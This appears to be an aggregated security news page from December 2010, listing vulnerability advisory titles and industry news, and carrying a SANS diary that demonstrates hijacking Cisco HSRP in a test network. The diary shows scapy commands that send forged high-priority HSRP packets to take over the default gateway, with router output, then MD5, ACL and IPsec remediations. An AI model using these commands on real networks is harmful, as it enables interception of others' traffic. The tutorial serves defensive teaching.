InfoSec News

The lead developer of the OpenBSD operating system says that he believes that a government contracting firm that contributed code to his project "was probably contracted to write backdoors," which would grant secret access to encrypted communications.
 
Linux Kernel Futex Macros Local Denial of Service Vulnerability
 
EMC this week announced it had completed its tender offer to purchase clustered NAS vendor Isilon Systems for about $2.16 billion.
 
An in-depth look at the considerations for evaluating client virtualization solutions
 
As the role of Active Directory evolves and becomes a central component of your infrastructure, consider the following steps to improve your security posture and your ability to facilitate productive business.
 
Over the past five years, many organizations have migrated from Lotus Notes/Domino to the Micrsofot platform, but have hesitated to tackle the most difficult part of the transition: migrating applications to SharePoint.
 
Some aspects of the ERP software landscape, such as tired legacy code-bases and disastrous implementation projects, may never go away. But in recent years, the pace of change with ERP has accelerated, and all signs are that will continue in 2011.
 
Fredrick Foster, vice president with Andrews International, is an authority on recognition and response to potential violence.
 
Samsung is now shipping SSDs aimed at enterprise-class storage systems. The new drives use consumer-type flash memory that helps lower their overall cost.
 
The FCC's decision to create new Net neutrality rules gets a mixed reaction.
 
Today, service providers and enterprises interested in implementing clouds face the challenge of integrating complex software and hardware components from multiple vendors. The resulting system can end up being expensive to build and hard to operate, minimizing the original motives and benefits of moving to cloud computing. Cloud computing platforms are attractive because they let businesses quickly access hosted private and public resources on-demand without the complexities and time associated with the purchase, installation, configuration and deployment of traditional physical infrastructure.
 
Git gitweb 'index.php' Multiple Cross Site Scripting Vulnerabilities
 
'mod_auth_mysql' Package Multibyte Character Encoding SQL Injection Vulnerability
 
Microsoft today said makers of phones running its new Windows mobile operating system had sold 1.5 million handsets since the October launch of Windows Phone 7 (WP7).
 
Reader Daniel is looking for ways to speed up his aging laptop, which he says is "slowly deteriorating" but needs to last another year or two.
 
The best CRM applications are really toolkits in disguise. When do you need to be focusing on buying "just an app," and when do you need to focus on the toolkit and platform?
 
Pete Lindstrom, a research director at Spire Security joins the editorial team to talk about the top IT security news stories of 2010.

Add to digg Add to StumbleUpon Add to del.icio.us Add to Google
 
Apple has pulled an iPhone app from the App Store that let users read secret U.S. diplomatic cables published by WikiLeaks and follow the controversial organization's Twitter feed.
 
Citrix Access Gateway User Credentials Command Injection Vulnerability
 
PR10-14 Unauthenticated command execution within Mitel's AWC (Mitel Audio and Web Conferencing)
 
The FCC today voted to implement compromise Net neutrality rules prohibiting broadband providers from blocking customer access to legal Web content. Critics say the rules are too weak.
 
The new site is for testing early Web standard technologies
 
The New York Times cobbled together a Ruby application to run on Amazon to report on live election results. Cost: a few hundred bucks.
 
Can we talk? Based on the e-mail I get every day, I know a lot of you are still using Windows XP. I can understand why; it's like a comfortable old shoe. Plus, it's bought and paid for. Windows 7 probably seems stiff and scary, and it's not like Microsoft is handing out free upgrades.
 
www.eVuln.com : Authentication Bypass by SQL Injection in Social Share
 
XSS vulnerability in ImpressCMS
 
Path disclosure in HTML-EDIT CMS
 
Microsoft Internet Explorer Uninitialized Object CVE-2010-3343 Memory Corruption Vulnerability
 
[security bulletin] HPSBST02619 SSRT100281 rev.1 - HP StorageWorks Storage Mirroring, Remote Execution of Arbitrary Code
 
Three SAP vice presidents and a head of services are leaving the company, as part of a major management reshuffle, it is understood.
 
The Cloud Security Alliance's matrix is a controls framework that gives a detailed understanding of security concepts and principles that are aligned to the CSA's 13 domains.
 
XSS vulnerability in Habari
 
Path disclosure in Habari
 
SQL Injection in HTML-EDIT CMS
 
XSS vulnerability in Habari
 
Solid-state storage has helped to raise the wave of portable PC alternatives that has hit the market over the past few years, and 2011 is likely to see that technology become more affordable and better performing.
 
PrestaShop 1.3.3 Multiple Cross-Site Scripting Vulnerabilities
 
Habari Multiple Cross-Site Scripting Vulnerabilities
 
So I started this series on Network Reliability Mechanisms back in September ( http://isc.sans.edu/diary.html?storyid=9583 ), and with work and life and the rest, I realized that I've let the promised installments in this series slide a bit.



In today's diary we'll explore and compromise HSRP - Cisco's Hot Standby Routing Protocol. Why would you want to do this you ask? You may remember some of our previous diaries on ARP Poisoning Man in the Middle attacks (for instance, this one == http://isc.sans.edu/diary.html?storyid=7303 ), and protections against them ( http://isc.sans.edu/diary.html?storyid=7567 ). Hijacking a redundancy protocol like HSRP allows you to bypass all of these layer 2 protections by simply participating in the (legitimate) HSRP exchange.
The Basics


In HSRP, the primary and backup router retain their interface ip address, and the virtual ip is homed on the router that is primary at any given time. HSRP is usually implemented to make the default gateway more reliable, so if you preempt the HSRP process on a subnet, in most cases all of the packets leaving the subnet will now transit your (attacking) host.



Basic HSRP Configuration



Lets start with a test network, shown here. We'll make R2 the primary HSRProuter, and R1 the backup router. Our host Attacker1 will attack the process.


To configure the backup router, we'll update the interface configuration:



On Router R1:



interface FastEthernet1/0

ip address 192.168.206.252 255.255.255.0

standby 1 priority 90

standby 1 ip 192.168.206.254
On Router R2:

interface FastEthernet1/0

ip address 192.168.206.253 255.255.255.0

standby 1 ip 192.168.206.254

standby 1 preempt




When you display the HSRP status on R2, we'll see that HSRP maintains a virtual MAC address separate from the physical interface, as well as a number of other useful variables (we'll use these later).



R2#sho stand

FastEthernet1/0 - Group 1

State is Active

5 state changes, last state change 00:00:22

Virtual IP address is 192.168.206.254

Active virtual MAC address is 0000.0c07.ac01

Local virtual MAC address is 0000.0c07.ac01 (v1 default)

Hello time 3 sec, hold time 10 sec

Next hello sent in 1.448 secs

Preemption enabled

Active router is local

Standby router is 192.168.206.253, priority 90 (expires in 9.460 sec)

Priority 100 (default 100)

IP redundancy name is hsrp-Fa1/0-1 (default)


Compromising the Protocol (Time for some fun !):



We'll use the general purpose packet manipulation tool scapy to mount the attack. There are a number of tools that can be used for this, among them yersinia and loki. Or the packets are simple enough, you can simply craft them yourself using python or perl. I chose to use scapy this time around, as I've heard great things about the tool, I haven't used it previously, and I figured it was time.



Let's start by looking at a normal packet exchange from a regular peering relationship (between R1 and R2). First a packet from R2, the primary.

And a packet from R1, the backup.


Note that everything is in clear text, my favourite two words !!

Let's mount the attack, using scapy. Scapy is written in python, and can be installed on may OS platforms, Windows, Linux and OS/X to name the top 3 - we'll use a Linux install today.
Well see some parameters here that look familiar (going back to the sho standbyoutput), you can see the full parameter list for hsrp available in scapy by viewing the file scapy/layers/hsrp.py. This check the sourcecodemethod is a really nice feature in scapy !




[email protected]:~$ sudo scapy

Welcome to Scapy (2.0.1)
We need root access to run craft, send and capture packets in linux, we'll use sudo to get that.


ip = IP(src='192.168.206.132', dst='224.0.0.2')
Set up the ip parameters - we'll source the attack from the eth0 ip address, and send to the HSRPmulticast, 224.0.0.2 (the same as in the packet captures above)


udp = UDP()
HSRPis a UDPprotocol


hsrp = HSRP(group=1, priority=230, virtualIP='192.168.206.254')
We'll be participating in HSRPGroup 1, we'll set the priority for the attacking host at 220, and set the virtual ip address to the default gateway. Note that all of the attack parameters are freely available in every HSRPpacket sent by the legitimate participants.


send(ip/udp/hsrp, iface='eth0', inter=3, loop=1)
Now we'll send the attack from the eth0 interface, every 3 seconds. The loop=1 parameter indicates that the attack is mounted until the process is stopped manually.




Once the attack starts, we'll see packets on the wire from the attacker:

On R2 we'll see the primary router go to a standby state:

%HSRP-5-STATECHANGE: FastEthernet0/0 Grp 1 state Active - Speak

%HSRP-5-STATECHANGE: FastEthernet0/0 Grp 1 state Speak - Standby



R2#sho stand

FastEthernet1/0 - Group 1

State is Standby

4 state changes, last state change 00:00:45

Virtual IP address is 192.168.206.254

Active virtual MAC address is 000c.29d0.fcb4

Local virtual MAC address is 0000.0c07.ac01 (v1 default)

Hello time 3 sec, hold time 10 sec

Next hello sent in 2.860 secs

Preemption disabled

Active router is 192.168.206.132, priority 230 (expires in 8.792 sec)

Standby router is local

Priority 100 (default 100)

IP redundancy name is hsrp-Fa1/0-1 (default)
R1 similarly transitions to Listen mode and stays there, as there can only be 1 active and 1 standby router

R1

*Mar 1 00:05:19.475: %HSRP-5-STATECHANGE: FastEthernet1/0 Grp 1 state Standby - Listen



R1sho stand

FastEthernet1/0 - Group 1

State is Listen

2 state changes, last state change 00:00:42

Virtual IP address is 192.168.206.254

Active virtual MAC address is 000c.29d0.fcb4

Local virtual MAC address is 0000.0c07.ac01 (v1 default)

Hello time 3 sec, hold time 10 sec

Preemption enabled

Active router is 192.168.206.132, priority 230 (expires in 7.800 sec)

Standby router is 192.168.206.252, priority 100 (expires in 8.820 sec)

Priority 90 (configured 90)

IP redundancy name is hsrp-Fa1/0-1 (default)
At this point, the HSRPprimary is the attacking linux host. If HSRP is implemented to represent the default gateway on this subnet, all packets leaving the subnet now go to this host, which can capture or modify at will before forwarding packets on to their final destination. Note that you'll want to set this final routing up correctly if you plan to use this method in a penetration test !!

Remediation - How Can We Fix This ?
In a word, authentication. We need to authenticate each host in the HSRPrelationship, so that unauthorized attackers are simply ignored - or better yet, their packets should be dropped and logged.
In HSRP, we do this with hashing, specifically MD5 Hashing. This is simply done in the configuration - an updated R2 configuration is below. Be sure to use a better key string than secretstring as shown in the example - Igenerally use an Excel sheet to generate stuff like this (a string of random characters, no zeros, o's, ones or l's - you get the idea).


interface FastEthernet1/0

ip address 192.168.206.252 255.255.255.0

duplex auto

speed auto

standby 1 ip 192.168.206.254

standby 1 preempt

standby 1 authentication md5 key-string secretstring



R2#sho stand

FastEthernet1/0 - Group 1

State is Active

8 state changes, last state change 00:00:11

Virtual IP address is 192.168.206.254

Active virtual MAC address is 0000.0c07.ac01

Local virtual MAC address is 0000.0c07.ac01 (v1 default)

Hello time 3 sec, hold time 10 sec

Next hello sent in 0.728 secs

Authentication MD5, key-string secretstring

Preemption enabled

Active router is local

Standby router is 192.168.206.253, priority 90 (expires in 8.760 sec)

Priority 100 (default 100)

IP redundancy name is hsrp-Fa1/0-1 (default)
In the packet captured below, you'll see that the plaintext in the HSRPpacket is now scrambled. Part of the payload is now MD5 hashed using the key-string.

If an attacker mounts the attack we've shown here, the authentication will fail anyou'll see this message:

*Mar 1 02:11:14.650: %HSRP-4-BADAUTH: Bad authentication from 192.168.206.133, group 1, remote state Speak


Often we'll also see access lists to limit inbound HSRPtraffic. This method is subject to ARPpoisoning, so is more useful in controlling inbound HSRPwhen there are multiple HSRProuter pairs on the same network.



ip access-list extended ACL_HSRP_INBOUND

permit udp host 192.168.206.252 eq 1985 any eq 1985

deny udp any eq 1985 any eq 1985 log

permit ip any any


Another way to get this done is to set up an IPSEC tunnel between the two HSRP participants, and direct all of the HSRPpackets through this tunnel.



ip access-list extended ACL_IPSEC_FOR_HSRP

permit udp any eq 1985 host 224.0.0.2 eq 1985


A final method of fixing HSRPis to implement VRRP, which has AH(Authentication Header) built into the protocol. Note that as a pentester, Isee MD5 on HSRP much more often than I see AH implemented on VRRP. Iattribute this to vendor documentation - Cisco discusses simple MD5 authentication in almost all of their HSRPdocumentation, and AHis not often so prominent in vendor documentation, maybe because it is deemed overly complex.
Stick around for our next installmentin this series !
An as always, if you have any comments on this discussion of HSRP or of the use of the scapy tool, please use our comment form
=============== Rob VandenBrink Metafore =============== (c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.
 

Failure to Enact Major Infosec Bill Foreseen
GovInfoSecurity.com (blog)
With help from some very astute Capitol observers and actors, readers of this blog shouldn't have been surprised that Congress failed to pass a significant, ...

and more »
 
Microsoft has pulled a non-security update to Outlook 2007 after customers complained of connection and performance issues when the automatic update was applied to company machines.

Add to digg Add to StumbleUpon Add to del.icio.us Add to Google
 
Sybase Afaria Cross Site Request Forgery Vulnerability
 
MHonArc HTML Mail Conversion Cross Site Scripting Vulnerability
 
Hycus CMS Multiple Input Validation Vulnerabilities
 
Diversity is key in Duke University's MBA-Cross-Continent program, which brings together students from around the world and sends them to several continents to learn. But when it comes to tools for linking the students and faculty in that program, a unified platform from Cisco Systems has brought several advantages.
 
Microsoft Office FlashPix Image Converter (CVE-2010-3952) Multiple Buffer Overflow Vulnerabilities
 
HP StorageWorks Storage Mirroring (CVE-2010-4116) Unspecified Remote Code Execution Vulnerability
 
Apple's move to stop offering applications from its Mac OS X download site the same day it opens the Mac App Store could leave some developers out in the cold.
 
Gmail users in the U.S can continue to call phones in North America and Canada for free after the new year, Google said in a blog post on Monday.
 
Microsoft's Windows PowerShell is, well, powerful, but also a bit peculiar. Here's what you need to know to get started with this robust command and scripting environment.
 
Microsoft Office FlashPix Image Converter (CVE-2010-3951) Buffer Overflow Vulnerability
 

Mobile security can dominate 2011: Narus
CIOL
The top three control procedures are expert security personnel, specialized training, collaboration in InfoSec community and policies and procedures. ...

and more »
 
The recession may have accelerated companies extending the lifecycles of PCs, laptops and servers, but that change may become permanent.
 
S9Y Serendipity 'manager.php' Arbitrary File Upload Vulnerability
 
Apple Mobile Safari 'decodeURIComponent' Remote Denial of Service Vulnerability
 
Openfiler 'device' Parameter Cross Site Scripting Vulnerability
 
FreeNAS 'index.php' Multiple Cross Site Scripting Vulnerabilities
 
InfoSec News: University Of Wisconsin-Madison Leaves 60, 000 SSNs Unprotected For Two Years: http://www.darkreading.com/database-security/167901020/security/attacks-breaches/228800912/university-of-wisconsin-madison-leaves-60-000-ssns-unprotected-for-two-years.html
By Kelly Jackson Higgins Darkreading Dec 20, 2010
A recent database breach that potentially exposed the Social Security [...]
 
InfoSec News: Hackers hit New York tour firm, access 110,00 bank cards: http://www.computerworld.com/s/article/9201822/Hackers_hit_New_York_tour_firm_access_110_00_bank_cards
By Robert McMillan IDG News Service December 20, 2010
Hackers have broken into the website of the New York tour company CitySights NY and stolen about 110,000 bank card numbers. [...]
 
InfoSec News: Call for Papers: Cyber Security in International Relations: Forwarded from: Brent Kesler <bdkesler (at) nps.edu>
Call for Papers: Cyber Security in International Relations Submissions due: February 1, 2011
Strategic Insights, an online journal published by the Center on Contemporary Conflict at the Naval Postgraduate School, is seeking [...]
 
InfoSec News: SAS man to take charge of cyber-warfare defences: http://www.independent.co.uk/news/media/online/sas-man-to-take-charge-of-cyberwarfare-defences-2164842.html
By Kim Sengupta independent.co.uk 20 December 20
A former chief of the SAS has been appointed to head the military's cyber-warfare operations amid rising concern about the risk of attacks [...]
 
InfoSec News: [Dataloss Weekly Summary] Week of Sunday, December 12, 2010: ========================================================================
Open Security Foundation - DataLossDB Weekly Summary Week of Sunday, December 12, 2010
4 Incidents Added.
======================================================================== [...]
 
InfoSec News: OpenBSD back door claim now in doubt: http://news.techworld.com/security/3253839/openbsd-back-door-claim-now-in-doubt/
By John E Dunn Techworld 16 December 10
The claim that the FBI planted a backdoor in OpenBSD a decade ago has been flatly denied by developer protagonists named as having been [...]
 
InfoSec News: Gawker tech boss admits site security was crap: http://www.theregister.co.uk/2010/12/18/gawker_hack_aftermath/
By Dan Goodin in San Francisco The Register 18th December 2010
Gawker Media plans to overhaul its web infrastructure and require employees to use two-factor authentication when accessing sensitive [...]
 
InfoSec News: You've Been Breached: Now What?: http://www.informationweek.com/news/security/attacks/showArticle.jhtml?articleID=228800744
By Adam Ely InformationWeek December 18, 2010
No one likes to think about database breaches, but the fact is, they happen. Rather than cross your fingers and hope for the best, create an [...]
 

Posted by InfoSec News on Dec 20

Forwarded from: Brent Kesler <bdkesler (at) nps.edu>

Call for Papers: Cyber Security in International Relations
Submissions due: February 1, 2011

Strategic Insights, an online journal published by the Center on
Contemporary Conflict at the Naval Postgraduate School, is seeking
scholarly papers on the role that cyber security and information and
communications technology (ICT) play in international relations and the
strategic thinking...
 

Posted by InfoSec News on Dec 20

http://www.independent.co.uk/news/media/online/sas-man-to-take-charge-of-cyberwarfare-defences-2164842.html

By Kim Sengupta
independent.co.uk
20 December 20

A former chief of the SAS has been appointed to head the military's
cyber-warfare operations amid rising concern about the risk of attacks
on official websites endangering Britain's defences.

Major General Jonathan Shaw will lead a unit combating internet assaults
on vital strategic...
 

Posted by InfoSec News on Dec 20

========================================================================

Open Security Foundation - DataLossDB Weekly Summary
Week of Sunday, December 12, 2010

4 Incidents Added.

========================================================================

DataLossDB is a research project aimed at documenting known and reported
data loss incidents world-wide. The Open Security Foundation asks for
contributions of new incidents and new data for...
 

Posted by InfoSec News on Dec 20

http://news.techworld.com/security/3253839/openbsd-back-door-claim-now-in-doubt/

By John E Dunn
Techworld
16 December 10

The claim that the FBI planted a backdoor in OpenBSD a decade ago has
been flatly denied by developer protagonists named as having been
involved in the conspiracy in an email sent to OpenBSD founder, Theo de
Raadt.

Sent by former NETSEC CEO and contractor Gregory Perry, the contentious
email named senior OpenBSD...
 

Posted by InfoSec News on Dec 20

http://www.theregister.co.uk/2010/12/18/gawker_hack_aftermath/

By Dan Goodin in San Francisco
The Register
18th December 2010

Gawker Media plans to overhaul its web infrastructure and require
employees to use two-factor authentication when accessing sensitive
documents stored online, following an embarrassing attack that
completely rooted the publisher's servers.

The publisher of Gawker, Gizmodo, and seven other popular websites also...
 

Posted by InfoSec News on Dec 20

http://www.informationweek.com/news/security/attacks/showArticle.jhtml?articleID=228800744

By Adam Ely
InformationWeek
December 18, 2010

No one likes to think about database breaches, but the fact is, they
happen. Rather than cross your fingers and hope for the best, create an
incident response plan ahead of time. Without a plan, you may destroy
critical evidence that could be used to prosecute the offender. You
might also overlook just...
 

Posted by InfoSec News on Dec 20

http://www.darkreading.com/database-security/167901020/security/attacks-breaches/228800912/university-of-wisconsin-madison-leaves-60-000-ssns-unprotected-for-two-years.html

By Kelly Jackson Higgins
Darkreading
Dec 20, 2010

A recent database breach that potentially exposed the Social Security
Numbers of 60,000 former students and staff at the University of
Wisconsin is bringing attention to the way higher education institutions
store and...
 

Posted by InfoSec News on Dec 20

http://www.computerworld.com/s/article/9201822/Hackers_hit_New_York_tour_firm_access_110_00_bank_cards

By Robert McMillan
IDG News Service
December 20, 2010

Hackers have broken into the website of the New York tour company
CitySights NY and stolen about 110,000 bank card numbers.

They broke in using a SQL Injection attack on the company's Web server,
CitySights NY said in a Dec. 9 breach notification letter published by
New Hampshire's...
 


Internet Storm Center Infocon Status